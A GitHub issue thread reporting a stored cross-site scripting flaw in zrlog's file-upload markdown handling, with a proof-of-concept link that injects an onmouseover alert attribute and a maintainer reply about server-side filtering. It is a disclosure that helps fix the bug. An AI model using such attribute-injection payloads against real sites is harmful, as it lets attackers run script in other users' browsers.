Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

There is a stored XSS in the file upload area #39

Open
3lse opened this Issue Sep 18, 2018 · 4 comments

Comments

Projects
None yet
2 participants
@3lse
Copy link

3lse commented Sep 18, 2018

After the file is uploaded correctly, "[abc](/zrlog/attached/file/20180918/20180918000718_50.jpg "abc")" will be displayed in the edit box.Combined with the page display, the XSS purpose is achieved by modifying the display content.
Poc
[click me](aa"onmouseover="alert(1)"s= "click me")

The page is displayed as "<a href="aa" onmouseover="alert(1)" s="title=" click="" me="me">click me</a>"

@94fzb

This comment has been minimized.

Copy link
Owner

94fzb commented Sep 19, 2018

@3lse The editor use marked lib as markdown parse lib
image

And you think reasonable way ?

@3lse

This comment has been minimized.

Copy link
Author

3lse commented Sep 19, 2018

@94fzb
There may be problems with the closure of the HTM, but this does not affect the generation of XSS.
e.g.
default

@3lse

This comment has been minimized.

Copy link
Author

3lse commented Sep 19, 2018

@94fzb You need to filter the acquired data on the server before saving to the database.

@94fzb

This comment has been minimized.

Copy link
Owner

94fzb commented Sep 19, 2018

@3lse Thanks, i try use jsoup filter sometime unsafe tag

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.